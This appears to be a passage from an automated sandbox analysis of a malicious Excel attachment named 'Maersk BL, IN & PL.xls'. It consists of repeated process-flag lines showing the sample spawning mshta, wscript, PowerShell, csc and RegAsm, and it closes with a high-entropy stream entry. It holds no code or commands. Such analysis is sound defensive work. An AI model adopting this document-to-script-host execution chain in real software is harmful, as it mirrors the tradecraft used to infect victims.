                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: Maersk BL, IN & PL.xlsStream path 'MBD00201B08/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
